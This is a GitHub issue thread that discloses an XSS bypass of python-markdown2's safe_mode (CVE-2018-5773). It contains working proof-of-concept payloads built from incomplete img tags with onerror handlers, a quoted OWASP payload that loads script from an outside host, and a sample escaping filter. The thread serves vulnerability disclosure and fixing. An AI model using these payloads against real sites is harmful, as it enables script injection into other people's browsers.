
Possible XSS in safe_mode using incomplete tags #285

Closed
vin01 opened this issue Jan 18, 2018 · 6 comments · Fixed by #303

Comments

@vin01
Contributor

vin01 commented Jan 18, 2018

PoC with latest version:

>>> from markdown2 import markdown as mark
>>> mark('<img src="" onerror=alert(/XSS/)>', safe_mode=True)
u'<p>[HTML_REMOVED]</p>\n'
>>> mark('<img src="" onerror=alert(/XSS/) ', safe_mode=True) # Please notice the space at end of string.
u'<p><img src="" onerror=alert(/XSS/) </p>\n'

using safe_mode="escape":

>>> mark('<img src="" onerror=alert(/XSS/)>', safe_mode="escape")
u'<p>&lt;img src="" onerror=alert(/XSS/)&gt;</p>\n'
>>> mark('<img src="" onerror=alert(/XSS/) ', safe_mode="escape")
u'<p><img src="" onerror=alert(/XSS/) </p>\n'

It will trigger an alert box in Chrome. I think it will be a better approach to encode the incomplete tags as well to prevent it.

https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet

@thmo

thmo commented Jan 29, 2018

This is CVE-2018-5773, is there a fix?

@nicholasserra
Collaborator

Not yet. PRs welcome!

@miigotu

miigotu commented Sep 13, 2018

Any progress on this CVE, or is there an alternative that is safe(r) to use in the meantime?

thombashi added a commit to thombashi/python-markdown2 that referenced this issue Sep 22, 2018
Add sanitization for incomplete HTML tags.
@vin01
Contributor Author

vin01 commented Oct 7, 2018

@nicholasserra @thombashi Thanks for making an attempt to fix it. Unfortunately, XSS is still possible. A modified payload:

>>> from markdown2 import markdown as mark
>>> mark('<img/src="" onerror=alert(/XSS/) ', safe_mode=True)
u'<p><img/src="" onerror=alert(/XSS/) </p>\n'

From: https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet

Yair Amit brought this to my attention that there is slightly different behavior between the IE and Gecko rendering engines that allows just a slash between the tag and the parameter with no spaces. This could be useful if the system does not allow spaces.

<SCRIPT/SRC="http://xss.rocks/xss.js"></SCRIPT>

I was able to do something similar with python-markdown as well and it looks like the community agrees on deprecating safe_mode and using tools like Bleach (https://bleach.readthedocs.io/en/latest/).

https://python-markdown.github.io/change_log/release-2.6/#safe_mode-deprecated
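As an added illustration (example code written for this thread, not markdown2's own safe_mode code and not the fix in #303 or #315): a post-filter that escapes the class of unterminated tag fragments both payloads above rely on, run over outputs constructed to mirror the REPL sessions in this issue.

```python
import html
import re

# "<" followed by a tag-name-like character ("<img", "<img/src", "</", "<!")
# with no ">" before the next "<" or the end of input. Constructed for this
# example; it is not markdown2's own safe_mode implementation.
_DANGLING_TAG = re.compile(r'<(?=[A-Za-z/!?])[^<>]*(?=<|\Z)')


def find_dangling_tags(text):
    """Return the unterminated tag fragments found in text (for logging/tests)."""
    return [m.group(0) for m in _DANGLING_TAG.finditer(text)]


def escape_dangling_tags(text):
    """Entity-escape every tag opener that is never closed by '>'.

    Browsers finish such a fragment at the next tag or at end of input, so
    '<img src="" onerror=... ' (note: no '>') still fires the handler even
    though a filter that only looks for complete <...> tags never sees it.
    """
    return _DANGLING_TAG.sub(lambda m: html.escape(m.group(0), quote=False), text)


# Outputs constructed to mirror what this issue reports markdown2's
# safe_mode produced for the two payloads, plus the complete-tag case.
SAMPLES = {
    'space':    '<p><img src="" onerror=alert(/XSS/) </p>\n',
    'slash':    '<p><img/src="" onerror=alert(/XSS/) </p>\n',
    'complete': '<p>[HTML_REMOVED]</p>\n',
}

if __name__ == '__main__':
    for name, out in SAMPLES.items():
        print(name, find_dangling_tags(out), repr(escape_dangling_tags(out)))
```

This only closes the dangling-opener gap; an allow-list sanitizer such as Bleach, as recommended in the thread, remains the right tool for untrusted markdown.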

@lsh-0

lsh-0 commented Oct 25, 2018

Just an FYI, GitHub is now sending out reports.

[screenshot at 2018-10-26 10-07-34]

@nicholasserra
Collaborator

@vin01 I just pushed up another PR to try and fix these edge cases. Can you give #315 a run and see if you can find any more issues? Thanks!
